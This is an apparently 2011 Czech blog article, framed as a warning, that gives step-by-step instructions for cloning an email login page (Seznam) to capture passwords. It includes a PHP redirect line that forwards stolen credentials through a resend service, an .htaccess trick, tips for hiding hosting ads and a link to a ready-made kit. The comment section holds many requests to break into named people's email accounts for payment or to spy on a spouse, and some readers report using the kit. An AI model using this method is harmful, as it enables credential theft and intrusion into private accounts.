Hacknutí hesla na e-mail - sociotechnika || na co dávat pozor?
Pomůžete mi hacknout heslo na email? Častá otázka s kterou se setkávám častěji a častěji, přiblížením jednoho z mnoha způsobů "hacknutí" e-mailu bych rád ukázal na jednoduchost a tím vás varoval na chyby, které mnozí z vás dělají. Popíšem si útok sociotechnika...
Aktualizováno 11.12.2011
"Jen dvě věci na světě jsou nekonečné...Vesmír a lidská hloupost...Tím prvním si ovšem nejsem jist..." Albert Einstein
Budem brát v úvahu, že útočník si vezme prohlášení pana Alberta jako radu a hlouposti lidí (hlouposti vaší) využije. Útok na váš email tedy může probíhat takto: kliknete na odkaz, zobrazí se výzva k přihlášení, přihlásíte se a čtete obsah stránek. VAŠE HESLO BYLO PROZRAZENO!
Hesla typu "Q.q!SaW_2" jsou zbytečná!
- stažená přihlašovací stránka (poslouží k vytvoření fake kopie)
- šikovně zvolená doména (klidně i druhého řádu, ovšem přesvědčivost klesá)
- základní znalost php a html (bo bezmyšlenkové stažení níže uvedených kodů :o) lol)
- šikovnost a využití vaší hlouposti
Co útočníkovi stačí:
Jak bude postupovat:
- jde na přihlašovací stránku a stáhne ji podobně jako na obrázku
- vytvoří si soubor například post.php a do něj vloží script, který zpracuje přijaté informace z kopie a odešle je například na email, script může vypadat třebas takto - zde
- otevře si zdrojový kod stažené stránky s loginem a upraví hodnotu atributu action="neco" na action="post.php" viz. obrázek
- nyní má post.php, složku souborů která vznikla stažením přihlašovací stránky a samotnou přihlašovací stránku
- přihlásí se na svůj hosting (například na wz.cz ) a soubory tam uploaduje
- nyní když zadá adresu která mu tímto vznikne www.jehohosting.cz/prihlasovacistranka.htm načte se klasické přihlášení, s tím rozdílem že zadaná hesla odesílá na email a poté přesměrovává na originální stránku...
- takový odkaz pak může poslat pomocí fake maileru nebo icq
Pár tipů
Umístěním .htaccess s tímto řádkem (umístění musí být v adresáři s login.html) docílíte zobrazení stránky i při "špatně zadané" url. Využití může být pro modifikaci url k zvýšení důvěryhodnosti.
ErrorDocument 404 /login.html
Dále třeba zobrazení reklamy na freehostingu může být nepříjemná věc, stránka pak na první pohled není reálná. Porušení pravidel freehostingů, ale skrytí reklamy dosáhnete umístěním reklamy do tagů div a pomocí css nastavíte display: none. Příklad:
<div style="display: none;"><!--reklama--></div>
Pokud chcete aby bylo přihlašování na fake webu funkční, můžete využít projektu GET2POST a v souboru send.php namísto přesměrování zaslat správné údaje ke skutečnému zpracování. V ukazkových souborech stačí nahradit řádek začínající header tímto:
header("location: http://www.soom.cz/projects/get2post/resend.php?username=".$user."&password=".$pass."&
login=p%C5%99ihl%C3%A1sit+se&serviceid=email&disablessl=0&forcessl=0&lang=cz&logintype=seznam&
returnurl=http%3A%2F%2Femail.seznam.cz%2Fticket&forcerelogin=0&coid=
&uri=https%3A%2F%2Flogin.szn.cz%2FloginProcess&domain=".$dom);
Jak se bránit? Stačí dodržovat tyto zásady:
- neklikejte na odkazy příchozí z neznámých adres a čísel
- neklikejte na odkazy které mají podivnou url
- zbystřete jestliže po vás odkaz vyžaduje heslo
- čtěte url a uvažujte
- pozor! nepřihlašujte se na veřejných terminálech (přesměrování například pomoci FuckDNS)
Odkazy
Testovací balík s připravenými soubory pro hesla seznamu (obsahuje v post.php řádek, starající se o informování napadeného uživatele!): zde
Vše slouží k prostudování hrozby přicházející z této strany, vaše počínání jde mimo mou osobu a veškerou odpovědnost tím berete na sebe! Zneužití je trestné!
Autor:  KdoSiOdJinud / Jan KuthanVydáno: 11.12.2011 11:22 Přečteno: 69652x |
Pod zámkem Konopiště zazněla 3.10. opera Rusalka Jak změnit MAC adresu? Lamerovi co si nepřizná že je lamer není pomoci - Ah... Jarní prázdniny 2009 - kdy jsou u vás? |
Komentáře
Ahoj pokud jsem to pochopil tento způsob je možný jenom pokud se přihlásí přes ten odkaz co jim pošleš.. tedy v celku nerealné ale ano je to možné že si lidi nečtou přikazový řádek... zda jsou opravdu tam kde chtěji být..
Nedávno proběhl útok tohoto typu na nejmenovanou banku tuším někde v JAR a úspěšnost byla přes 30%, ber v potaz, že šlo o banku kde si přeci jen lidé dají větší pozor.
Tento článek je ale varování, že takto můžou útočníci postupovat - v dnešní době nemusí už člověk znát prosté základy php ani html a fake stránku si vyrobí pomocí jednoduchého programu...
Ahoj, da sa zistit heslo na yahoo? Niekto mi hackol a nemozem sa tam dostat :( je to adresa tsadilek@yahoo.com zaplatim tomu, co mi povie heslo. mal som tam dost dolezite veci, ale dolezite iba pre mna.... ak niekto na to pride, prosim poslite mi to na pacalo@azet.sk
dakujem
Ahoj protřebuji heslo k mému e-mailu někdo mi ho hacku prosím je to nutné v.dulakova@seznam.cz prosím pošlete mi to na aevratbv@seznam.cz
Ahoj, potřebuji zjistit heslo k e-mailu, je to nějak možné? LSechter@seznam.cz, prosím o poslání na e-mail lsechter@tiscali.cz
Ahoj, zkoušel jsem ty tvoje soubory, vytvořil si tu webovku, přihlásil se, a povedlo se, všecko v poho, ale na druhý den už ne, na druhý den se mi nešlo přihlásit přes mé staré heslo, nevíš čím to je? 0.o
Je to OK a funguje akorát by mě zajímalo jak použít script na jinou stránku než email... Třeba fecebook nebo jiného přihl formuláře
Cus hale potreboval bych hacknout email dubisvet@seznam.cz ukradlimiho kdyz tak mi to heslo pls posli na email nukleonek@seznam.cz diky moooc jestli to udelas cus
Ahoj, zklamu Tebe a i ostatní s podobným požadavkem - hesla k emailům nikomu nezjišťuji a ani to dělat nebudu. Tento článek má být informativní - ukazuje co je možné a jak to může být snadné zjistit Vaše heslo. Nic z toho co tu je nesmí být použito k uvedení někoho v omyl! Je to porušení zákona a takové jednání se trestá...
Ahoj, heslo je: m*********
Editoval KdoSiOdJinud: Lidi, uvědomte si, že to tu ani nemůžu nechat - neznáte emaily atd...?
Ahoj. potreboval bych zjistit heslo k email _______@seznam.cz , odmena zajistena ! ozvi se na moshgr@hotmail.com nebo GSM 721 380 064 . dik
cau potreboval bych zjisti heslo k email chladic88@email.cz ozvi se na email Dands12@seznam.cz dik a cau
Potřebuji zjistit heslo na email na seznamu,zaplatím !!!!!
pište na becka.l@seznam.cz
Potřebuju zjistit heslo na mail. Nechci to zadarmo!!
Prosím, pomozte mi.
pište na indiankaa.a@seznam.cz
Potřebuji zjistit heslo na email na seznamu,zaplatím !!!!!pište Orea122@seznam.cz
potřebuji zjistit heslo na centrumácký email. Finance samozřejmostí. pište na pokoj.furt@centrum.cz
Dobrý večer,
nabízím finanční odměnu za získání hesla na centrum.cz. Zájemnci ať mě kontaktují na mail karasjiri@email.cz
Děkuji
vy mainici kdyt to funguje uplne v pohode stači se jenom naučit programovat
a lépe se vyznat v programovacích kodech !! funguje i soubor log takže skript je dobrej jen to chce logigku a znalosti programovaní 
páááánovééé
Lidi, chtěl bych mít odvahu, jako máte Vy. :D Na stránku o hackingu vkládat své e-mailové adresy, čísla ICQ a další podobné údaje, tohel je projevem absolutního amaterismu, ba dokonce sindromu BFU. :-D Přímo si tím říkáte o to, aby Vám někdo naboural i tohle. Vy si myslíte, že nějaký hacker by Vám na pohádku o tom, jak Vám přítel naboural e-mail a ničí život naletěl? :-D Mám pro Vás jednu radu, najděte si někde na Googlu návod, jak si vytvořit nezlomitelné heslo a to použivejte. Hesla stylu *jméno*, nebo *přijmení*, či podobné šílenosti velice usnadňují práci. :D
Nic proti tvému "zveřejňováni" ale právě si provozovateli řekl svou IP a to pouze tím, že jsi sem vstoupil :D
a k čemu ti to neprolomitelne heslo bude kdyz "tim" o co tu vlastne jde, si to heslo zjistím ajt je jakékoliv :-)
V podstatě nevím,jak to muj byvalý udělal,ale dostal se mi do třech důležitých mailu, změnil hesla a teď tam řádí,jak smylu zbavený. Píše všem mým kamarádům dokonce i cizim lidem,že jsem coura nebo je zve na rande a dává všem mé číslo... Na seznamu jsem psala aminovi a ten to zatrhne,ale na atlasu nevím.... Moc prosím chci se zeptat je to co dělá trestné? A popřípadě nepomohl by mi prosím někdo dostat se do jednoho mailu, je pracovni a muze mi zničit celý život. Předem děkuji za odpověď...Ozvěte se na icq: 383073480 Simka
Simčo, vím, že je to už stará událost, ale hodně nápadně se podobá té mé ?
Jen se chci zeptat, jestli náhodu iniciály tvého bývalého nejsou J.S. ??
Moc by mi ta odpověď pomohla, předem děkuji...
vse je hotove po kliknuti script pracuje a presmeruje vyhledavac jenze bohuzel nevytvori soubor log.txt nejaky typ mail je prdochobecny@email.cz
dobrý den prosím vás stáhl jsem si testovací balík všechny soubory extrahoval načetl na wz a když zadám adresu na kterou jsem to umístnil vyhodí mi to nějakouchybu mohl by jste i poradit nic jsem nepřepisoval pouze všechny soubory nahrál na web wz...
icq: 204324253
Čau lidi.Prosím nějakýho machra o radu.Potřeboval bych se dostat do emailu svý ženy,protože mě nejspíš podvádí,ale nejsem si jistej.Používáme společný PC.Emailovou adresu znám,ale heslo neznám.Poradte prosím,snad to nějak půjde zjistit,aby o tom nevěděla.Nechci bejt za vola a chci mít jistotu,než to s ní budu řešit.Díky.Kdyžtak pište na: novye-mail@email.cz
Paroháč jsi a paroháčem zůstaneš! A nepomůže ti ani email:)))
mohl by mi někdo poradit ja se dostanu do emailu bez hesla????diky Majkl.69.69@seznam.cz
Kdyz je email "bez hesla" tak ho nezadavej
. Tento text je jen vystraha a ukazani jednoduchosti vytvoreni fake stranky, neni to navod jak se dostavat do cizich emailu > porusovani listovniho tajemstvi. Jinak predpokladam ze jsi necetl ani clanek a jestli si myslis, ze ti nekdo honem bude posilat spousty navodu na email jsi myslim na omylu...